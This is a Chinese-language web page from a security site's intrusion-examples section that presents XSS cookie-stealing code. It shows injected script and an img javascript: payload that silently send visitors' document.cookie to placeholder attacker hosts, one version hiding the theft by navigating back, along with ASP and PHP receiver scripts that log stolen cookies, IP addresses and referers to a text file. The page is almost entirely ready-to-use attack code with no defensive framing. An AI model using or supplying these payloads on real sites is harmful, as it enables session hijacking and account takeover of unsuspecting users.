首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
XSS(跨站)偷cookie的代码
来源:vfocus.net 作者:vfocus 发布时间:2011-05-06  

<script>document.write('<img
src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0
border=0 />');</script>

news.asp代码:
<%
msg=Request.ServerVariables("QUERY_STRING")   
testfile=Server.MapPath("cook.txt")   
set fs=server.CreateObject("scripting.filesystemobject")   
set thisfile=fs.OpenTextFile(testfile,8,True,0)   
thisfile.Writeline(""&msg& "")   
thisfile.close   
set fs = nothing   
%>

news.php代码:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp,
'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: '
.$time. '<br> Referer:
'.$referer.'<br><br><br>');
fclose($fp);
?>


作者:樱木花盗 发表于 2009-10-16 22:49:52

—————————————————————————————————————————————

另附叶子(http://www.yezishell.cn/)的一篇文章:

忙乎了半个小时写这句XSS代码,几个月没有复习快忘记的差不多了,这里给记录一下吧,自己要求的基本效果是不影响对方页面,所以必须加入一个返回的要求

在这个语句中可以自由变换其形,达到自己的要求即可

下面这句是用img的html元素写的,常用script已经不再流行了,往往更换一个类型可能更有意思

<img src=javascript:document.location='http://xxxxxxx/cookie.asp?msg='+escape(document.cookie);window.history.back(-1)>

上面的语句意思很简单,就是掉到cookie后返回前一页,达到隐藏的一个小目的

附cookie.asp欺骗代码:

<%
testfile=Server.MapPath("自定义文件.txt")
msg=Request("自定义数据表")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Xss获取管理员后台地址实战
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·渗透校内网——XSS过程详解
·mysql可多语句执行下不用单引号o
·高级PHP手工注入
·xss跨站脚本攻击大全
·微软的“后门”:NTSD.exe,的远
·1433终极入侵之沙盒模式
·linux不提权跨目录访问的代码
·Firefox攻击技巧总结
·入侵纽约大学过程
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved